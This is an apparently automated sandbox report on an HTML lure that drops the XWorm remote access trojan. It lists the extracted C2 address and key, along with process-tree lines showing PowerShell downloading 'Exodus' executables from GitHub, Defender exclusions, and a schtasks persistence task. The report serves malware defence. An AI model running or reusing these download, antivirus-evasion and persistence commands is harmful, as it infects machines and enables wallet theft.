Analysis
-
max time kernel
457s -
max time network
463s -
platform
windows11-21h2_x64 -
resource
win11-20250217-en -
resource tags
-
submitted
05/03/2025, 21:51
General
-
Target
file.html
-
Size
7KB
-
MD5
cb37a07989c743fff42af9d822533933
-
SHA1
3bca2e7d9ecb4ab0f4c3ec3a75a80b7d6041bd43
-
SHA256
e6e9207db9da7a8a626f739314dac6a2426698603793b99902104050cf6b4292
-
SHA512
ef783e2cd94f3637b8ce08452f9e2107c923b99e5371740c3caa2e957eb529c3fa65b481a837fd917394a125a6ba83f3166d3e543c2dbe59463174aedca31a20
-
SSDEEP
96:PNybXaotqEb0EZ2W87IfrI2+nomtaaGBj0YhNM7UlNbOG9zrYbXnSvN4Yzueh8tR:PN2x2BeM2+1DGlM7UrbOInYTnSlZyLN
Malware Config
Extracted
xworm
5.0
137.184.74.73:5000
Y2rnj2CSRObOXXLb
-
Install_directory
%ProgramData%
-
install_file
System.exe
Signatures
-
Detect Xworm Payload 1 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Blocklisted process makes network request 8 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Powershell Invoke Web Request.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 10 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 64 IoCs
-
NTFS ADS 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
-
Suspicious use of AdjustPrivilegeToken 17 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 24 IoCs
-
Suspicious use of SetWindowsHookEx 26 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\file.html1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff92443cb8,0x7fff92443cc8,0x7fff92443cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3776 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3996 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1292 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7040 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6076 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5860 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1872,11367671572353567574,4216371420252909592,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2780 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe"C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B4CA.tmp\B4CB.tmp\B4CC.bat C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe"C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD8EC.tmp.bat""4⤵
-
C:\Windows\system32\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe"C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe"3⤵
- Executes dropped EXE
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\AggregatorHost.exeC:\Users\Admin\AppData\Roaming\AggregatorHost.exe1⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\ProgramData\System.exe"2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe"C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe"C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe"1⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6C14.tmp\6C15.tmp\6C16.bat C:\Users\Admin\Desktop\ExodusWallet\ExodusLoader.exe"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/ExodusInject.exe' -OutFile 'C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/refs/heads/main/Exodus.exe' -OutFile 'C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe"C:\Users\Admin\Desktop\ExodusWallet\ExodusInject.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe"C:\Users\Admin\Desktop\ExodusWallet\Exodus.exe"3⤵
- Executes dropped EXE
-
-
-
C:\ProgramData\System.exeC:\ProgramData\System.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\System.exeC:\ProgramData\System.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\System.exeC:\ProgramData\System.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\System.exeC:\ProgramData\System.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f6c3217ec689b141d7f25ac85fc4a743
SHA17f9a3649763d4ce860b1b7317697072a1e41a7c0
SHA256bd4870c8c9528c06c8354a711800590546f6556b2304877dc4bedb612d71e27b
SHA5121f603310bf1a649eb2df3e05f06d49827b5167b83435f1350bb305a0a0d365a0ed99287d973d507d467c22f2b407bb952ed13c236624cde753cedf39d1524cf8
-
Filesize
1KB
MD5c2c59919d45232691e841adcf85a7ed2
SHA1f7a1d810e35e455618050f586592a445376c3224
SHA256e567ead667e68f92cf9b7a7b171f2dd628803add6dc0744004f26808048bb47c
SHA512bd37bbed0d8512bfaba4185722831ca73fe5be4d5625b74e9f18cfe1cc0bbd4af786c36eca1bd856decbbc68d1f472ee8aef8e1a41b7251ff480e8fb4eabed6b
-
Filesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
Filesize
152B
MD546ec2d399c9d10a0545cb514e47de14e
SHA198fc6f3f34f4082b8d81cc50dc571ec06eb454ca
SHA256f50fff32b15e4b61c3cb18655c3daf46a83556aef1f3ff8d9ed074f298f247a5
SHA512993b723da7b0ffcaa731a1f06057bf2ebdc2fd518ef8765b4f625b9fd0094cc6abdccfe998d0e6cb760a3e5d6c411b197a47e67c1de5a6ec4315d017a552a2be
-
Filesize
152B
MD5a1ea058d6231b47f5bb8557adba13351
SHA1111dbb6ffff6517e11719a20683fd7f4ef0579d2
SHA256f5a91a0770c54a1601557b8babfcc7813972275da171c384cc8929d2910a851f
SHA512e613f481c50b5a7022a763d13ac1b1ebb6a9d4d973de95108d95d23844d9d526d8c90f391493f043e86e22e9a5abd8a3a4cab5f2def248033d0eb9421091889b
-
Filesize
214KB
MD5d20fef07db1e8a9290802e00d1d65064
SHA171befda9256ed5b8cd8889f0eeab41c50d66e64e
SHA256f9cb4624d03224bfce50c4c0e484418acd462c249f38b4684e72b27a1f30144d
SHA512ad5b2c8df60027c6dd5104bb8c2357b04eb24d69245c607ff99a6f2a887f929428252ad793d9aaa8c903c7b1e1bf9653cd35f79747d5281e7e3d2c21fa828537
-
Filesize
1KB
MD52344eb29941d21ba1d7292e6ac8ff70f
SHA1fe166fda30d55866a72b80758b13cb3ed6e4fd0e
SHA256a7bb0f37be0d4b95c59accf4c8aa8b71e8f909ac12fc7a2d549d5c6a2ea80157
SHA51230ce5c60e2b8df44b9e6a459616fb4a6d41869f23057e851077e46bdb028414883db5e43dc0a755f23769e6672b42c74fa890978ce54cd14f966078563829f54
-
Filesize
816B
MD5fc794590b38b971c6d48e84c6bdc7864
SHA115b891049d8fd23665b3c5e34f7459774f61255b
SHA2564279f7191e1dd4623540df0cc23f4cb391f19889c2e054b1e9964a14d9eda2ad
SHA51225bd939cc5048063d91c7c079cd0ada8fbcbbe8193b74816f35703df07b4cded2e3be80627db5296f156e282187a8c38a7ca889db82e36062e6ee5a1b169f41a
-
Filesize
4KB
MD5d4771aed8c3f5effe6acc8b1c11753da
SHA1c91c2f12f5a5a94c54186e0d7061cd5cfab6c43a
SHA25621fae843cfd75efc56f8c5c764ad662748ddff7c97a568c0a49087b6f146c070
SHA51281d34af5746edfbc8eaab5d70cf9404edc6482ae7fc37e4f250f4bf1c6e3ebe0c3cbc32f837bd6454cd60c2cd6d55eaba2e19e7a7ed8e714784bfd94322c3558
-
Filesize
3KB
MD5c6635c18052a035862099d0ccadb38c2
SHA1bb546d05264d173a58eced5e3db120b7a448e202
SHA2565d4e1eeb3eeee93c18cf2b1237dc452ca5afb3fc4996035d16c902695363be74
SHA5125b9e949e5573e10e1c41c9b3d6a84d87c91f055f416732d1d7fdd5f82fb4cb3add735fd5fa4fcf41e3159631af0e0a14e71ff9ae3dceea2812285498372e401d
-
Filesize
3KB
MD567f4c061cfeeece7738929e430c9d83a
SHA1ed1ba7570b1798b660f3f4193f030c20d32a61c0
SHA256b4825a76683a23c40a488298e11089a5440a99659b5d2ac02d9dfcf075769b37
SHA5125603feebd071a853ee508b8711953cd08786fb7fb0d5da0bd78a12fdce136d5c31505cc6f01450b4b97b7a2abc1aa0e5e18b00d1f4b343318f4ce7d017355c3e
-
Filesize
4KB
MD51a4b53bad7c41628318021d64c5b4861
SHA15d5ab26b4fa2c4a0f7c674de4f96dd01ccf669ee
SHA256d7643bc9bd2c8c1d69c007c8afb458cbac65febc969252bae993d5479f80d77a
SHA5122b4b8ab5c9f95cfcd8070f0f520010b7bd8bf042d25b11af17ba795a0f6fcf8c264dba8d8873866ad9924715bb0506acfbb3d917b24caefa80a632ed90412e77
-
Filesize
5KB
MD50de0698968f5ebbb07c4ca3ce7ea81a8
SHA1a842ecb0ced4368f95217ac9b0a6bba35b1b70ff
SHA2562559e6be16a98e80971e872dfb7310583a33a80735a8d70a6e4ec487d9625657
SHA5121ab91e07a12cfa9ce3ef5f1c91a34063342baf0be5e1b0a6764dcae3b7ab9f5810c4f7730303d6d28c259472e95b1a92dd5419ce06fd97395156a145f00b147f
-
Filesize
7KB
MD59b3a54357b8db4b59eb1c80efc8774bf
SHA1be4f9ee9ef6e2f3a2b83f83b5e8a5c2a417387cf
SHA256837eac0675d02ad2178bc4aa1db7528af612c40f24f9e4e4c72c4e758ae5324e
SHA5125310ee6b9770a4906b9186d95f9c1eccac95e9b525f8af0c1d7699f558176e220d788a118d3e401a8e47a0a3d873e5e2c6cb78e13a75e0915000244c6078b55e
-
Filesize
5KB
MD50d73e97666b98d132b014a39ba8c759e
SHA1588fbc7a7e40eecbd41e2cd9a6c9639bb7240c3d
SHA2566d96f960be58038e871fb25485b8913c9d53f1dd76b610e37929f0a65f735e2c
SHA51273419548a8b14575bc5db6d691536e05e2f9bd30de072cefe030ed99b6d83407bf3249ce26fe784f8b20fb7283e9e6eb0127376c59961b87a3c8bd0c83c4f1c5
-
Filesize
8KB
MD5cacc2be503f04f84b9e0ecedb38c55c1
SHA1533ccf2c0cc47631078a7d949adbfa6dc4e37dca
SHA2566e5edbefc044b52bf231e5c7b986dc19f84e3ea0d85509767a7ec2b6282b601a
SHA512d43fa480852708d7bf815f89438864dadd6b62bf2ab49b601aee9f3ad9029f2fc0322175fd48fa7a2e13b08f825d46dcfc0284facdf9b6e534e6ee3862c0d3cb
-
Filesize
1KB
MD5e8ca2f8c3e4a717f147df157d5169123
SHA15402fe8b147690aab92652b2e9de14f90d78bc22
SHA2566ae6bfc6570d7b946494f606b73297cf8278d1889304e58b625ac2c335571d51
SHA512c172355feeb5327801eac9bee2bb9b7c63f193072a42777a247c747dbaf14d29df42462660576523730c646b83c4466a1de59a61260fa6d36c0615f9ee428c42
-
Filesize
1KB
MD56086937979a5fd01477baab4ada550c4
SHA1ba3a583d56ffe7b8acba3cfed3f28ae1c8094a53
SHA256a27364144452d998904852f04e48f0afe80060787099b528811652527892fe90
SHA5120d274e72138180572b700a77d4a2979911ff736b417a1910bfac76eeee8f74790f1e696709bf11be64ca07ba39cc48e76d2d504163365e2c5cafb651c039e2c8
-
Filesize
538B
MD548a2bb391f913cff4f79242725660e95
SHA16f46d17d9ebf62b5d9029b4dfa704ce87d3dd614
